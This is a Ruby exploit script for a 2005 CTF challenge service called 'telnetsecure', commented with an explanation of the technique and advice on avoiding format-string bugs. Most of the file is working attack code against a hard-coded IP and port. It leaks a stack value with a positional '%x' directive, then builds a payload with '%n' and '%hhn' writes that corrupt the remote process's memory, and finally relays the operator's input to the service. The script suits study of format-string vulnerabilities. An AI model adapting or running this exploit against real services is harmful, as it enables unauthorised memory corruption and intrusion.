#!/usr/bin/ruby
# telnetsecure exploit - securitech 2005
# Yoann Guillot
#
# Interactive client for a 2005 CTF challenge service. Every "login" line it
# sends is made of printf-style directives ('%32$x', '%33$n', '%55$hhn'),
# i.e. the script relies on the remote service passing user input straight
# through as a format string. Defensive takeaway: a format string must be a
# literal and user data belongs in the argument list; -Wformat-security
# warns on non-literal formats, and fortified libc builds reject the '%n'
# family in non-constant format strings, which is exactly what this depends on.
require 'socket'

# Connect to the hard-coded challenge host/port.
s = TCPSocket.open('194.158.103.26', 2323)

# Reader thread: copy whatever the service sends to stdout one byte at a
# time, flushing after each byte so prompts and echoed output appear as they
# arrive. read(1) returns nil at EOF, which ends the loop. The thread is
# never joined; it is killed when the main thread exits.
Thread.new {
  loop do
    x = s.read 1
    break if not x
    print x
    $stdout.flush
  end
}

# Stage 1: send a positional format directive as the first input line; the
# service presumably formats and echoes it, printing its 32nd argument slot.
# The second line is filler for the following prompt.
s.puts '%32$x'
s.puts 'bla'

# The operator reads the value echoed by the reader thread and types it back
# as hex. NOTE(review): gets returns nil on stdin EOF, so gets.hex raises
# NoMethodError there, and a non-hex answer silently parses as 0.
puts "offset ?"
buf = gets.hex
puts("0x%.8x" % buf)

# Stage 2: assemble the second login line.
login = 'black'
# Pad the login name to exactly 7 bytes. ('x' * negative) raises
# ArgumentError if login is ever longer than 7 characters.
h4x = login + ('x'*(7-login.length))
# Positional %n directive (stores the running character count).
h4x += '%33$n'
# Offset the operator-supplied value by the login length.
buf += login.length
# Append buf as 4 little-endian bytes.
h4x += (buf & 0xff).chr + ((buf >> 8) & 0xff).chr + ((buf >> 16) & 0xff).chr + ((buf >> 24) & 0xff).chr
# Precision padding: 7 + 4 + 245 = 256 characters have been emitted by the
# time the next directive is reached.
h4x += '%.' + (256 - (7 + 4)).to_s + 'x'
# Single-byte positional store of that count.
h4x += '%55$hhn'

# Show the exact bytes about to go on the wire (inspect escapes them).
puts ' => ' + h4x.inspect
s.puts h4x
s.puts 'bla'

# Relay the operator's stdin to the service line by line until stdin EOF.
# The socket is never closed explicitly; process exit releases it.
while l = gets
  s.puts l
end